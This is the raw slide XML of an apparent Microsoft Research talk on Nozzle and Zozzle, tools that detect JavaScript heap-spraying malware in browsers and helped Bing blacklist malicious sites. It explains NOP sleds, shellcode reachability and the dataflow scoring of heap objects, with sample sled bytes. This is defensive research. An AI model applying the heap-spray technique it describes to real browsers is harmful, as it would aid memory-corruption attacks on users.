              <a:rPr lang="en-US" smtClean="0"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8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BED2-54FF-4BBE-8DB9-62BDF4ADEB8A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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1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F1C4F-5CAF-42A5-96AA-0CF7E9A0076D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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4492-FFFE-44D6-BD6D-3C2FB3AFA188}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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70A1-DAB5-4192-AEED-223E93BEE3EF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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3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6D69-73FB-4881-805D-A08130204044}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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5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FEC-F4C9-4D73-B487-C4B7E70037B0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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D6B9-AB24-4ECA-8D83-61BE68A5BD68}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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AFA9-D68B-49B3-BC57-70B7AEBC8265}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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6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8387-02C4-42B7-A6A5-DCAE917F3FCC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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7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0413B-4AA4-48CD-AF72-F1F8BC287BD3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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0"/>
            <a:ext cx="1524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3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customXml" Target="../ink/ink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projects/nozzle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2secure.com/2009/07/mozilla-firefox-35-heap-spray.html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log.fireeye.com/research/2009/07/actionscript_heap_spray.htm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7392"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="785323"/>
            <a:ext cx="4772167" cy="607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8153400" cy="177165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Finding Malware </a:t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on a Web Scale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3124200"/>
            <a:ext cx="4426426" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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 Livshits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1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r"/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 Zorn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/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Christian Seifert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/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Charlie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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Curtsinger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1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r"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1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Microsoft Research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Redmond, WA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 14" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC90029086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137768" cy="3230578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" sx="143000" sy="14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Nozzle and Zozzle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					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Research to Reality in 18 Short Months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096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algn="r"/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350173" y="2109943"/>
            <a:ext cx="6621142" cy="4078455"/>
            <a:chOff x="1350173" y="2109943"/>
            <a:chExt cx="6621142" cy="4078455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2417540" y="2371553"/>
              <a:ext cx="4135660" cy="3358576"/>
              <a:chOff x="304800" y="609599"/>
              <a:chExt cx="8763000" cy="560043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04800" y="609599"/>
                <a:ext cx="2819400" cy="259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276600" y="609599"/>
                <a:ext cx="2819400" cy="259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248400" y="609599"/>
                <a:ext cx="2819400" cy="259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04800" y="3505199"/>
                <a:ext cx="2819400" cy="259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276600" y="3505199"/>
                <a:ext cx="2819400" cy="259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248400" y="3505199"/>
                <a:ext cx="2819400" cy="259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685800" y="685799"/>
                <a:ext cx="2247403" cy="2514600"/>
                <a:chOff x="76200" y="152400"/>
                <a:chExt cx="4304803" cy="6702175"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="29" name="Picture 28" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC900383550[1].wmf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2852537"/>
                  <a:ext cx="2057400" cy="40020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" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DQ7F3EO7\MC900078711[1].wm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2600" y="152400"/>
                  <a:ext cx="2628403" cy="40908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3631197" y="685799"/>
                <a:ext cx="2286000" cy="2311405"/>
                <a:chOff x="609600" y="990600"/>
                <a:chExt cx="3352800" cy="4415462"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="27" name="Picture 15" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC900078801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400" y="1447800"/>
                  <a:ext cx="3048000" cy="39582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609600" y="990600"/>
                  <a:ext cx="1524000" cy="1295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457440" y="623905"/>
                <a:ext cx="2513935" cy="2576494"/>
                <a:chOff x="304800" y="22261"/>
                <a:chExt cx="3955350" cy="6855431"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="25" name="Picture 2" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A0ICM3NI\MC900383566[1].wm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2915292"/>
                  <a:ext cx="3345750" cy="396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C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A0ICM3NI\MC900383566[1].wm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676400" y="22261"/>
                  <a:ext cx="2583750" cy="30599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537630" y="3505199"/>
                <a:ext cx="2413692" cy="2524695"/>
                <a:chOff x="328438" y="152400"/>
                <a:chExt cx="4111799" cy="6705600"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="22" name="Picture 15" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC900078801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38" y="2899739"/>
                  <a:ext cx="3048001" cy="39582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381000" y="2743200"/>
                  <a:ext cx="1295400" cy="1143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4" name="Picture 9" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A0ICM3NI\MC900078739[1].wm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828800" y="152400"/>
                  <a:ext cx="2611437" cy="2590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7" name="Picture 3" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC900078794[1].wm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4068" y="3352800"/>
                <a:ext cx="2824332" cy="2857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6248400" y="3505200"/>
                <a:ext cx="2819400" cy="2590800"/>
                <a:chOff x="152400" y="-152400"/>
                <a:chExt cx="5200445" cy="7043057"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Picture 3" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A0ICM3NI\MC900389194[1].wm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0" y="3690257"/>
                  <a:ext cx="2378592" cy="3200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3" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A0ICM3NI\MC900389194[1].wm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752600" y="-152400"/>
                  <a:ext cx="2835792" cy="3200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C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A0ICM3NI\MC900383566[1].wm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320357" flipH="1">
                  <a:off x="2530992" y="3276600"/>
                  <a:ext cx="2583750" cy="30599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 rot="1800000">
              <a:off x="1586618" y="2109943"/>
              <a:ext cx="11961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d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="00B05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rama</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800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20700000">
              <a:off x="6401846" y="2171498"/>
              <a:ext cx="156946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m</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="00206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ore drama</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000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9800000">
              <a:off x="1416030" y="5780871"/>
              <a:ext cx="125624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d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000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iscovery</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty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8238494">
              <a:off x="6212647" y="5428094"/>
              <a:ext cx="99738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h</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="28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ope</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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8372243">
              <a:off x="478299" y="3957118"/>
              <a:ext cx="226696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c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="28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ollaboration</a:t>
              </a:r>
              <a:endPara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800000">
              <a:off x="6402918" y="3920003"/>
              <a:ext cx="146161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uncertainty</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000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276600" y="6336268"/>
            <a:ext cx="272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 2009 – February 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91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Nozzle &amp; Zozzle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13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5216275"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1524000"/>
          <a:ext cx="8077200" cy="181356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981200"/>
                <a:gridCol w="3344736"/>
                <a:gridCol w="275126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Nozzle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Zozzle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 static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False</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> positives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 in a billion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 in a ¼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million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Reach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Finds 1,000s of malicious URLs for Bing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Goes beyond SafeBrowsing and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> AV detection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" y="2286000"/>
            <a:ext cx="8305800" cy="134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1.2312E-6 L -1.11022E-16 0.057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Nozzle: Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Heap Spraying Detection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8" name="Picture 2" descr="C:\pmax\main\ndure\nozzle\paper\data\econ_vs_exp-612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7738" y="2347913"/>
            <a:ext cx="4386262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flipV="1">
            <a:off x="457200" y="2438400"/>
            <a:ext cx="0" cy="3124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7200" y="5562600"/>
            <a:ext cx="3733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477145" y="5039902"/>
              <a:ext cx="3830400" cy="2674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65" y="5028022"/>
                <a:ext cx="3854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5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="495505" y="2438400"/>
              <a:ext cx="3888720" cy="2860342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665" y="2422559"/>
                <a:ext cx="3920400" cy="2892024"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O17RYBCL\MC900413624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18" y="2277324"/>
            <a:ext cx="2292036" cy="344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5105400" y="1893209"/>
            <a:ext cx="3655255" cy="1459591"/>
            <a:chOff x="5105400" y="1893209"/>
            <a:chExt cx="3655255" cy="1459591"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="57" name="Straight Arrow Connector 56"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5105400" y="2286000"/>
              <a:ext cx="732653" cy="1066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562600" y="1893209"/>
              <a:ext cx="3198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Normalized attack surface (NAS)</a:t>
              </a:r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752600" y="2602468"/>
            <a:ext cx="657552" cy="2348523"/>
            <a:chOff x="1752600" y="2602468"/>
            <a:chExt cx="657552" cy="2348523"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="TextBox 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1752600" y="2602468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good</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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1981201" y="3124200"/>
              <a:ext cx="57577" cy="18267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733800" y="2906786"/>
            <a:ext cx="1032137" cy="1463046"/>
            <a:chOff x="3733800" y="2906786"/>
            <a:chExt cx="1032137" cy="1463046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="TextBox 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4227007" y="4000500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bad</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="70" name="Straight Arrow Connector 69"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="58" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3733800" y="2906786"/>
              <a:ext cx="762672" cy="10937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33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az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ple-exploi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 smtClean="0"/>
              <a:t>Local Malicious Object Detection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2971800" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>Code or Data?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none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264025" y="2174875"/>
            <a:ext cx="4727575" cy="3921125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Is this object code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Code and data look the same on x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Focus on sled detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Majority of object is sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Spraying scripts build simple sleds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Is this code a NOP sled?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Previous techniques do not look at heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Many heap objects look like NOP sleds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>80% false positive rates using previous techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Need stronger local techniques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2511425" y="914400"/>
            <a:ext cx="4422775" cy="639762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Is this object dangerous?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none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4F4B630-C11F-4532-A7DB-A7B147335D5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609600" y="2286000"/>
            <a:ext cx="1524000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000000000000000000000000000000000000000000000000000000000000000000000000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000000000000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2286000" y="2286000"/>
            <a:ext cx="1600200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add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eax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], al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add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eax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], al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add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eax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], al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add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eax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], al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add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eax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], al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add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eax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], al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add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eax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], al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609600" y="4267200"/>
            <a:ext cx="1524000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0101010101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0101010101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0101010101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0101010101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0101010101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0101010101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0101010101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2286000" y="4267200"/>
            <a:ext cx="1600200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and ah,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edx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and ah,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edx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and ah,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edx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and ah,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edx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and ah,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edx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and ah,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edx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and ah, [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edx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905000" y="1752600"/>
            <a:ext cx="1600200" cy="3581400"/>
            <a:chOff x="1905000" y="1752600"/>
            <a:chExt cx="1600200" cy="3429000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="1752600"/>
              <a:ext cx="1600200" cy="3048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NOP sled</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="32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05000" y="4800600"/>
              <a:ext cx="1600200" cy="381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/>
                <a:t>shellcode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348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+mj-lt"/>
              </a:rPr>
              <a:t>Object Surface Area Calculation (1)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Assume: attacker wants to reach shell code from jump to any point in object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Goal: find blocks that are likely to be reached via control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Strategy: use dataflow analysis to compute “surface area” of each block </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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BA0A167-59DF-4969-BF15-064A43B8E6D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5181600" y="5943600"/>
            <a:ext cx="2667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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An example object from visiting google.com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85250"/>
            <a:ext cx="3810000" cy="465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71076" y="19281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+mj-lt"/>
              </a:rPr>
              <a:t>Object Surface Area Calculation (2)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Each block starts with its own size as weight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Weights are propagated forward with flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Invalid blocks don’t propagate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Iterate until a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>fixpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Compute block with highest weight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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BA0A167-59DF-4969-BF15-064A43B8E6D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5181600" y="5943600"/>
            <a:ext cx="2667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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An example object from visiting google.com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85250"/>
            <a:ext cx="3810000" cy="465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5562600" y="1143000"/>
            <a:ext cx="3273486" cy="4712732"/>
            <a:chOff x="5562600" y="1143000"/>
            <a:chExt cx="3273486" cy="4712732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5562600" y="3505200"/>
              <a:ext cx="301686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86600" y="5486400"/>
              <a:ext cx="301686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19800" y="1143000"/>
              <a:ext cx="301686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86600" y="4876800"/>
              <a:ext cx="301686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62600" y="2819400"/>
              <a:ext cx="301686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34400" y="3429000"/>
              <a:ext cx="301686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15000" y="1143000"/>
            <a:ext cx="3273486" cy="4712732"/>
            <a:chOff x="5715000" y="1143000"/>
            <a:chExt cx="3273486" cy="4712732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5715000" y="3505200"/>
              <a:ext cx="418704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39000" y="5486400"/>
              <a:ext cx="418704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72200" y="1143000"/>
              <a:ext cx="301686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39000" y="4876800"/>
              <a:ext cx="418704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15000" y="2819400"/>
              <a:ext cx="301686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86800" y="3429000"/>
              <a:ext cx="301686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70514" y="1143000"/>
            <a:ext cx="3082590" cy="4712732"/>
            <a:chOff x="5870514" y="1143000"/>
            <a:chExt cx="3082590" cy="4712732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5870514" y="3505200"/>
              <a:ext cx="418704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94514" y="5486400"/>
              <a:ext cx="418704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27714" y="1143000"/>
              <a:ext cx="418704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94514" y="4876800"/>
              <a:ext cx="418704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70514" y="2819400"/>
              <a:ext cx="418704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34400" y="3581400"/>
              <a:ext cx="418704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&quot;No&quot; Symbol 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="4419600"/>
            <a:ext cx="381000" cy="3810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62800" y="3200400"/>
            <a:ext cx="19050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Nozzle Global Heap Metric</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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7EBD1453-4CAE-459E-B186-079CC19DEE63}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj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86027969"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="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05600" y="3239869"/>
            <a:ext cx="117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build CFG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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4916269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dataflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="C:\Documents and Settings\b-parujr\Desktop\talk\cfg-google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3697069"/>
            <a:ext cx="1219200" cy="156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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6400800" y="1524000"/>
            <a:ext cx="685800" cy="1143000"/>
            <a:chOff x="6400800" y="1295400"/>
            <a:chExt cx="685800" cy="1143000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6400800" y="1295400"/>
              <a:ext cx="6858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00800" y="1524000"/>
              <a:ext cx="6858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0800" y="1752600"/>
              <a:ext cx="6858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00800" y="1981200"/>
              <a:ext cx="6858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00800" y="2209800"/>
              <a:ext cx="6858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19800" y="5906869"/>
            <a:ext cx="1922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Compute threat of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>single block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6059269"/>
            <a:ext cx="1922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Compute threat of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>single object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4230469"/>
            <a:ext cx="1677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Compute threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>of entire heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1487269"/>
            <a:ext cx="2587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Normalize to (approx):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>P(jump will cause exploit)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0" y="1219200"/>
            <a:ext cx="1295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D603E6-D1CA-4B35-B3FE-A5B5E8B64D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29D603E6-D1CA-4B35-B3FE-A5B5E8B64D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4910B3-A3E3-4FB6-8173-F3EA353F6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C84910B3-A3E3-4FB6-8173-F3EA353F6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EFC4A4-AF3C-486B-982F-75194A1D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2EEFC4A4-AF3C-486B-982F-75194A1D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35B892-F379-43DC-B59B-A10218BC6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5735B892-F379-43DC-B59B-A10218BC6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8DCEC2-04D0-4DD5-93BF-3ED86B4CD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B98DCEC2-04D0-4DD5-93BF-3ED86B4CD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7964A8-5E75-4643-8E23-B9DC31C66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BB7964A8-5E75-4643-8E23-B9DC31C66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0C3D76-C097-44BD-8861-D5701E565E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2F0C3D76-C097-44BD-8861-D5701E565E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E22335-461B-48BA-B7B2-5C5C4823A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17E22335-461B-48BA-B7B2-5C5C4823A9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7DD902-AE6A-4281-915A-FCF738B93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CA7DD902-AE6A-4281-915A-FCF738B93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E8C96F-64FA-4EBF-8D28-682A05591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46E8C96F-64FA-4EBF-8D28-682A05591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FE44DC-8BC8-406D-AC6C-5B9DF13F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0EFE44DC-8BC8-406D-AC6C-5B9DF13F99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33E440-24ED-4D0A-B594-1FB1A7964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3E33E440-24ED-4D0A-B594-1FB1A7964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 uiExpand="1"/>
      <p:bldP spid="7" grpId="0" uiExpand="1"/>
      <p:bldP spid="15" grpId="0" uiExpand="1"/>
      <p:bldP spid="16" grpId="0" uiExpand="1"/>
      <p:bldP spid="17" grpId="0" uiExpand="1"/>
      <p:bldP spid="18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Nozzle Experimental Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b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5924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D1453-4CAE-459E-B186-079CC19DEE6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286000"/>
            <a:ext cx="7772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mtClean="0"/>
              <a:t>Bing finds 1,000s of malicious sites using Nozzle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Very few false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Increased Bing’s detection capability two-fold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Blacklisting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware in Search Results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56032" y="2255320"/>
            <a:ext cx="3096768" cy="4221680"/>
            <a:chOff x="6302085" y="956449"/>
            <a:chExt cx="2713038" cy="2842010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="http://www.applewooddata.co.uk/Images/Server%20Farm%20front%20Veiw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6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6302085" y="956449"/>
              <a:ext cx="2096428" cy="209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://userlogos.org/files/logos/Rog/bing.com_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872" y="2461350"/>
              <a:ext cx="2111251" cy="133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2" name="Picture 1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 bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2033016"/>
            <a:ext cx="8172976" cy="407517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29200" y="2667000"/>
            <a:ext cx="3962400" cy="1752600"/>
            <a:chOff x="990601" y="3429000"/>
            <a:chExt cx="3962400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Rectangular Callout 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
